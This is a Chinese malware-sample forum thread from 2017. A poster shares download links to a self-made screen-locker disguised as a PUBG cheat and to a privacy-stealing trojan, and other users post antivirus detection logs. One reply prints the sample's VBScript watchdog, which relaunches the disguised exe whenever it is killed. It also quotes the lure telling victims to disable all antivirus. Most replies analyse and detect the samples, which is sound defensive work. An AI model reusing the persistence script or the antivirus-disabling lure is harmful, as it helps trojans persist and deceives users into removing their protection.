自制锁机病毒发布[2017/12/15]

显示全部楼层 · 发表于 2017-11-8 21:05:12

2017/11/8最后一个版本发布：http://pan.baidu.com/s/1dEDqv3j

显示全部楼层 · 发表于 2017-11-8 21:11:57

TheYuCheng 发表于 2017-11-8 21:05
2017/11/8最后一个版本发布：http://pan.baidu.com/s/1dEDqv3j

右键过 WIEP扫描。
未双击。

显示全部楼层 · 发表于 2017-11-8 21:22:14

别忘了你上次就说是最后一个版本了

显示全部楼层 · 发表于 2017-11-8 21:33:55

本帖最后由 ELOHIM 于 2017-11-8 21:41 编辑

SORRY
我双击了。
启动果然快。
配乐不错。
但是。
针对 XP 受限用户没任何作用啊。
并且。
双击以后 WIEP将其强行斩首。额额额……

Microsoft 反恶意软件已检测到恶意软件或其他可能不需要的软件。
有关更多信息，请查看下列内容:
http://go.microsoft.com/fwlink/? ... threatid=2147718745
      名称: Trojan:Win32/Azden.A!cl
      ID: 2147718745
      严重性: 严重
      类别: 特洛伊木马
      路径: file:_C:\Documents and Settings\XX\桌面\绝地求生外{过}{滤}挂.exe;process:_pid:212,ProcessStart:131546211563642596
      检测原点: 本地计算机
      检测类型: 动态签名
      检测源: 系统
      用户: NT AUTHORITY\SYSTEM
      进程名称: C:\Documents and Settings\XX\桌面\绝地求生外{过}{滤}挂.exe
      签名版本: AV: 1.257.229.0, AS: 1.257.229.0, NIS: 0.0.0.0
      引擎版本: AM: 1.1.14306.0, NIS: 0.0.0.0

受限用户可以注销，可以重启，虽然任务管理器窗口不能置顶。但是有快捷键啊。桌面的图片文档都没有任何损坏。
就是锁了一会屏幕……别的不知道……………………恢复快照ing...

option Explicit
dim wmi,proc,procs,proname,flag,WshShell
Do
proname="绝地求生外{过}{滤}挂.exe"
set wmi=getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set procs=wmi.execquery("select * from win32_process")
flag=true
for each proc in procs
if strcomp(proc.name,proname)=0 then
flag=false
exit for
end if
next
set wmi=nothing
if flag then
Set WshShell = Wscript.CreateObject("Wscript.Shell")
WshShell.Run ("C:\DOCUME~1\VM\桌面\绝地求~1.EXE")
end if
wscript.sleep 1000 '检测间隔时间，这里是50秒
loop

复制代码

THEN
微软现在可以解压杀掉了……

杀毒软件可能会有误报！
打开前记得添加到所有杀毒软件的白名单并关闭所有杀毒软件，谢谢！
否则软件可能会发生错误
毕竟是游戏外{过}{滤}挂，可能会有误报

忽悠，继续忽悠……

显示全部楼层 · 发表于 2017-11-8 21:37:04

TheYuCheng 发表于 2017-11-8 21:05
2017/11/8最后一个版本发布：http://pan.baidu.com/s/1dEDqv3j

火绒KILL

病毒库：2017/11/07 16:13
开始时间：2017/11/08 21:35
总计用时：00:00:00
扫描对象：2个
扫描文件：1个
发现风险：1个
已处理风险：1个
发现系统修复项：0个
处理系统修复项：0个
病毒详情
风险路径：C:\Users\USER\Downloads\Compressed\Virus Test\绝地求生外{过}{滤}挂\绝地求生外{过}{滤}挂.exe, 病毒名：Trojan/WreckSecurity.a, 病毒ID：[ce35d6d2726c4007], 处理结果：已处理

复制代码

HVM特征收录

显示全部楼层 · 发表于 2017-11-8 21:50:19

盗取隐私病毒最后版本发布：https://pan.baidu.com/s/1eScWO6m

显示全部楼层 · 发表于 2017-11-8 21:57:40

本帖最后由 zst470396853 于 2017-11-8 21:58 编辑

TheYuCheng 发表于 2017-11-8 21:05
2017/11/8最后一个版本发布：http://pan.baidu.com/s/1dEDqv3j

360miss 已上传

上传后 kill

QQkill

显示全部楼层 · 发表于 2017-11-8 22:01:40

本帖最后由 zst470396853 于 2017-11-8 22:04 编辑

TheYuCheng 发表于 2017-11-8 21:50
盗取隐私病毒最后版本发布：https://pan.baidu.com/s/1eScWO6m

盗取隐私

360 提示已上传

上传鉴定后 kill

显示全部楼层 · 发表于 2017-11-8 22:02:30

TheYuCheng 发表于 2017-11-8 21:50
盗取隐私病毒最后版本发布：https://pan.baidu.com/s/1eScWO6m

WIEP 右键删掉了。

显示全部楼层 · 发表于 2017-11-8 22:43:35

TheYuCheng 发表于 2017-11-8 21:50
盗取隐私病毒最后版本发布：https://pan.baidu.com/s/1eScWO6m

火绒特征收录

病毒库：2017/11/08 16:40
开始时间：2017/11/08 22:43
总计用时：00:00:01
扫描对象：2个
扫描文件：1个
发现风险：1个
已处理风险：1个
发现系统修复项：0个
处理系统修复项：0个
病毒详情
风险路径：C:\Users\USER\Downloads\Compressed\Virus Test\svchost_3\svchost.exe, 病毒名：Trojan/WreckSecurity.a, 病毒ID：[ce35d6d2726c4007], 处理结果：已处理

复制代码

[病毒样本] 自制锁机病毒发布[2017/12/15]

本帖子中包含更多资源

本帖子中包含更多资源